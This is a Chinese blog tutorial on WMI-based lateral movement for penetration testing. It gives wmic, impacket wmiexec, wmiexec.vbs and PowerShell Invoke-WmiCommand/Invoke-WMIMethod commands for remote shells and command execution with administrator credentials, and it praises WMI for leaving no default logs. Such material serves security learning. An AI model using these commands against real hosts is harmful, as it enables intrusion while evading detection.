WMI的使用

最新推荐文章于 2024-04-20 10:15:23 发布
最新推荐文章于 2024-04-20 10:15:23 发布
阅读量2.7k 收藏 6
点赞数 1
分类专栏: 横向移动 文章标签: 内网渗透 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/118946255
版权

WMI

介绍

WMI的全名为"Windows Management Instrumentation"。从win8后,Windows操作系统都支持WMI,WMI可以在本地或者远程管理计算机系统。

自从PsExec在内网中被严格监控后,越来越多的反病毒厂商将PsExec加入了黑名单,于是乎攻击者转向使用WMI进行横向移动。在渗透时发现,在使用wmiexec进行横向移动时,Windows操作系统默认不会将WMI的操作记录在日志中。因为这个过程不会记录日志,所以对蓝队来说大大增加了溯源的成本。对攻击者来说,被发现的可能性降低,隐蔽性提高。很多APT组织现在都喜欢使用WMI进行攻击。

基本命令

首先我们执行如下命令,将输出结果保存在目标机器对应的C盘目录下

wmic /node:192.168.108.101 /user:Administrator /password:Admin12345 process call create "cmd.exe" /c ipconfig >C:\ip.txt

在这里插入图片描述
然后我们建立IPC共享命名管道,用于读取执行结果

net use \\192.168.108.101\ipc$ "Admin12345" /user:Administrator

在这里插入图片描述

type \\192.168.108.101\C$\ip.txt

在这里插入图片描述
其实接下来的话我们都可以使用wmic进行远程执行命令,但是目标服务器需要开放135端口,wmic会以管理员权限在远程系统中执行命令。如果目标服务器开了防火墙,wmic将无法进行连接。除此之外,单纯使用wmic命令它没有回显,需要配合IPC$命名管道和type命令进行文件内容的查看。若我们执行的是恶意程序,将不会留下日志信息。

impacket工具包中的wmiexec

在kali上安装impacket工具包,我们使用wmiexec.py这个利用脚本获取目标系统的Shell。该方法主要是从Linux向Windows进行横向渗透测试时使用

python3 wmiexec.py administrator:Admin12345@192.168.108.103

在这里插入图片描述

wmiexec.vbs

wmiexec.vbs脚本通过VBS调用WMI来模拟PsExec的功能。wmiexec.vbs可以在远程系统中执行命令并进行回显,获得远程主机的半交互式shell。

cscript.exe //nologo wmiexec.vbs /shell 192.168.108.103 administrator Admin12345

在这里插入图片描述
对于运行时间较长的命令,需要添加-wait 5000或者更长的时间参数。在运行nc等不需要输出结果但需要一直运行的进程时,使用-persist参数,就不需要使用taskkill命令来远程结束进程了。

Invoke-WmiCommand

该脚本调用WMI来远程执行命令,本质上还是在利用WMI。这里实施成功的权限为RemoteSigned

//目标系统用户名
$User="hacke.testlab\administrator"
//目标系统密码
$Password=ConvertTo-SecureString -String "Admin12345" -AsPlainText -Force
//将账号和密码整合起来,以便导入Credential
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User , $Password
//远程执行命令
$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 192.168.108.103
//将结果输出到屏幕上
$Remote.PayloadOutput

在这里插入图片描述

Invoke-WMIMethod

利用powershell自带的Invoke-WMIMethod,可以在远程系统中执行命令和指定程序。这个命令的好处是不会收到策略权限的限制,是权限持久化的较好选择。

//目标系统用户名
$User="hacke.testlab\administrator"
//目标系统密码
$Password=ConvertTo-SecureString -String "Admin12345" -AsPlainText -Force
//将账号和密码整合起来,以便导入Credential
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User , $Password
//在远程系统中运行"计算器"程序
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "192.168.108.103" -Credential $Cred

在这里插入图片描述

平凡的学者
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
服务器CPU高占用-WMI Provider Host(VMware虚拟机)
weixin_57323573的博客
06-28 8837
WMI Provider Host高CPU使用率,VMTools导致,【WMI-Activity】中包含大量报错日志。异常进程为 【vmtoolsd.exe】 。AppInfo功能禁用。
横向移动检测之远程执行(四)WMI/WMIC
qq_27828281的博客
12-13 4608
横向移动——WMI/WMIC远程执行分析及溯源
攻击域控丝滑小连招~
m0_74360619的博客
02-02 618
在Kali中打开命令行进入存放ntds.dit目录中,使用esedbexport 恢复,输入如下命令来提取表信息,如图6-26所示,恢复时间视ntds.dit大小决定,导出成功会在同目录生成一个文件夹。下载成功后,将impacket工具包安装在Kali上,impacket是基于使用Python编写的,Kail默认安装了Python,直接输入命令,如图6-30所示。成功安装后,打开命令行进入ntds.dit和SYSTEM目录,输入如下命令,成功导出ntds.dit中所有Hash,如图6-31所示。
WMI 介绍
博弈星宇
08-01 1235
1)、点击"连接",输入想要查询的名称空间,再点击"连接",即可连接到特定名称空间(如果远程连接其他主机,则需要在命名空间中添加IP,如:\\10.66.6.39\root\cimv2,输入用户名和密码,点击连接即可)。注:.由于.Net缺省的编译环境中并没有包括命名空间System.Management的容器文件System.Management.dll,所以首先要在项目文件中引入此DLL文件。2)、然后点击"枚举类",在弹出的界面中选择"递归",然后点击"",就会得到这个名称空间下所有的类。
Windows安全基础——Windows WMI详解
最新发布
qq_53058639的博客
04-20 1016
WMI(Windows Management Instrumentation, Windows管理规范)是Windows2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,DistributionModel)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。
Impacket官方使用指南
weixin_30877755的博客
04-09 2824
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
c++ wmi使用demo
09-24
在这个“c++ wmi使用demo”中,我们将探讨如何使用C++通过WMI来获取设备信息,特别是硬盘序列号。 首先,我们需要包含必要的头文件,如`#include <windows.h>`和`#import <wbemidl.h>`,以使用WMI接口。`wbemidl.h`...
WMI使用的WIN32_类库名
07-17
WMI使用的WIN32_类库名 包括:硬件类、操作系统类、安装应用程序类、WMI服务管理类、性能计数器类
c#与WMI使用技巧集第1/2页
12-31
 首先要在VS.NET中创建一个项目,然后在添加引用中引用一个.net的装配件:System.Management.dll,这样你的项目才能使用WMI。代码如下: using System; using System.Management; class Sample_...
WMI_Introduction.rar_carbon91i_deerc8x_delphi WMI使用_delphi wmi
09-15
本文将深入探讨Delphi中如何使用WMI,以及“WMI_Introduction”这个日文示例中的关键知识点。 首先,让我们理解WMI的基本概念。WMI是Windows操作系统的一个核心组件,它提供了一种标准的接口,使得开发者可以获取...
WMI远程操作调用代码
03-22
WMI 远程 操作 注册表 远程执行CMd
wmi使用方法
06-01
在实际应用中,WMI Samples提供的示例可能包括了如何使用不同语言(如C++、VBScript、C#等)与WMI交互的代码,展示了如何查询、创建、修改和删除WMI对象,以及如何调用WMI方法。通过这些示例,你可以深入理解WMI的...
WMI技术介绍和应用——执行方法
方亮的专栏
01-21 5204
        在之前的博文中,我们主要介绍了如何使用WMI查询信息和接收事件。本文将介绍WMI的另一种用法——执行方法。(转载请指明出于breaksoftware的csdn博客)         这块的内容在msdn中有详细的介绍,如果想看原版的可以参阅《Example: Calling a Provider Method》         本文将基于《WMI技术介绍和应用——VC开发WMI...
【C#学习之路】WMI进程操作实现程序远程更新
qq_25199617的博客
03-19 813
本博客旨在记录学习或开发中遇到的一些问题。最近需要实现上位机局域网内,在本地和远程实现软件的更新,实际上就是实现本地和远程的文件、进程操作。文件操作好说,直接File.Copy()就好,本地进程操作使用Process()即可实现,主要是远程进程操作我多方查阅后使用WMI实现。提示:以下是本篇文章正文内容,下面案例可供参考希望会对你有所帮助。完整的程序是用WPF的MVVM模式实现的,也是我正在学习部分,完整代码有需自取(转到github。
什么是WMI
12-19 1536
 什么是WMI WMI。中文名字叫Windows管理规范。从Windows 2000开始,WMI(Windows 管理规范)就内置于操作系统中,并且成为了Windows系统管理的重要组成部分。所以大家很容易就能见到它的,因为我们至少也应该是个Windows 2000的使用者了。下面我将详细介绍它的每个细节,让你从不认识它到喜欢上它。 WMI能做什么? WMI不仅可以获取想要的计算机数据,而
WMI技术介绍和应用——WMI概述
热门推荐
方亮的专栏
12-28 4万+
今天,我要开始一系列关于微软WMI技术的介绍。通过之后若干节的介绍,我想WMI技术将为在windows平台上从事开发的朋友开启另外一扇窗。(转载请指明出于breaksoftware的csdn博客)         第一次接触WMI技术是在一年前,当时我接到一个研究型的需求,无意中发现WMI技术是最可靠的解决方案。当时,WMI这种“特别”的使用方式让我这个VC程序员产生了浓厚的兴趣——像写SQL般
电脑技巧:WmiPrvSE.exe是什么进程?WMI Provider Host占用很高CPU的原因及解决办法
IT技术分享社区
11-03 1万+
遇到此类情况,可以使用 Eventvwr.msc 打开「事件查看器」,导航到「应用程序和服务日志」——「Microsoft」——「Windows」——「WMI-Activity」——「操作」,在错误日志的 ClientProcessId 字段中可以查看到引起问题的进程 PID。例如,通过软件或脚本代码可以查询有关 BitLocker 驱动器加密状态的信息、查看事件日志中的条目,或者通过 WMI Provider 调用当前系统中已安装的应用程序,等等操作。
剑走偏锋--使用WMI获取远程计算机进程程序集中查毒病毒打造内网安全环境
04-09 1084
剑走偏锋-使用WMI获取远程计算机进程程序 集中查毒病毒打造内网安全环境 作者:高玉涵 时间:2019.04.1815:45 博客:blog.csdn.net/cg_i 作者背景环境参见: 《由永恒之蓝病毒引发的运维安全思考——网络边界防御篇 》 《非常运维 一体化终端安全管理系统自动安装脚本详解》 TMOTWTDI-- Perl名言 真正见功夫的地方不在于代码本...
VB使用WMI编程(零号).doc
11-29
VB使用WMI编程是一项非常有益的技能,对于VB程序员来说,WMI提供了一种方便的方法来管理Windows系统的软硬件设备。以前,VB程序员在编写这样的程序时,往往要调用繁复的API函数,这给他们带来了很多困难。然而,WMI...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值